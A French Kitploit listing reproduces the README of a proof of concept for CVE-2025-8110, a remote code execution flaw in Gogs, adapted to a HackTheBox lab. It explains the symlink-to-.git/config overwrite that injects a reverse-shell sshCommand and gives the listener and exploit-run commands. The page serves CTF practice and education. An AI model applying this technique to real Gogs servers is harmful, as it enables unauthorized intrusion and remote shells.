Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 Spécifiquement pour la boîte Silentium sur HTB. | Kitploit
Outils/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 Spécifiquement pour la boîte Silentium sur HTB.

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-8110 — PoC RCE Gogs (Silentium / HackTheBox)

Avertissement : Cet outil est destiné strictement à des fins éducatives et à des tests de pénétration autorisés. Utilisez-le uniquement contre des systèmes pour lesquels vous avez une autorisation explicite de tester.


Ceci est une version modifiée de zAbuQasem/gogs-CVE-2025-8110, adaptée pour fonctionner contre la machine Silentium sur HackTheBox. Le PoC original nécessitait des ajustements pour gérer la configuration spécifique de Gogs et le flux d'authentification de Silentium.


La vulnérabilité

CVE-2025-8110 est une vulnérabilité d'exécution de code à distance dans Gogs, un service Git auto-hébergé.

Le point de terminaison API de mise à jour de fichier de Gogs (PUT /api/v1/repos/.../contents/<file>) ne valide pas si le fichier cible est un lien symbolique. Un attaquant authentifié peut pousser un lien symbolique dans un dépôt pointant vers .git/config, puis utiliser l'API pour le remplacer par une charge malveillante. La charge utile injecte une commande sshCommand personnalisée dans la configuration git, que Gogs exécute côté serveur la prochaine fois qu'il effectue une opération SSH sur ce dépôt, entraînant une exécution de code à distance.


Ce que fait le PoC

  1. S'authentifie sur Gogs et extrait un jeton CSRF de la page de connexion.
  2. Génère un jeton API Gogs via la page des paramètres utilisateur.
  3. Crée un nouveau dépôt via l'API avec SSH activé.
  4. Clone le dépôt localement, place un lien symbolique (malicious_link -> .git/config), et le pousse.
  5. Appelle l'API de mise à jour de fichier sur le lien symbolique, en écrivant un .git/config malveillant qui contient sshCommand = <reverse shell>.
  6. Gogs suit le lien symbolique et écrase son propre .git/config, déclenchant le shell lors de la prochaine opération SSH.

Utilisation

Installer les dépendances :

root@kitploit:~
pip install -r requirements.txt

Démarrer un écouteur :

root@kitploit:~
nc -lvnp <PORT>

Exécuter l'exploit :

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

Optionnel — routage via Burp Suite :

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
OptionDescription
-uURL de base de Gogs
-lhVotre IP d'attaque (hôte du shell inversé)
-lpVotre port d'écoute
-unVotre nom d'utilisateur Gogs enregistré
-pwVotre mot de passe Gogs
-x(Optionnel) Router le trafic via Burp sur localhost:8080
Télécharger l’outil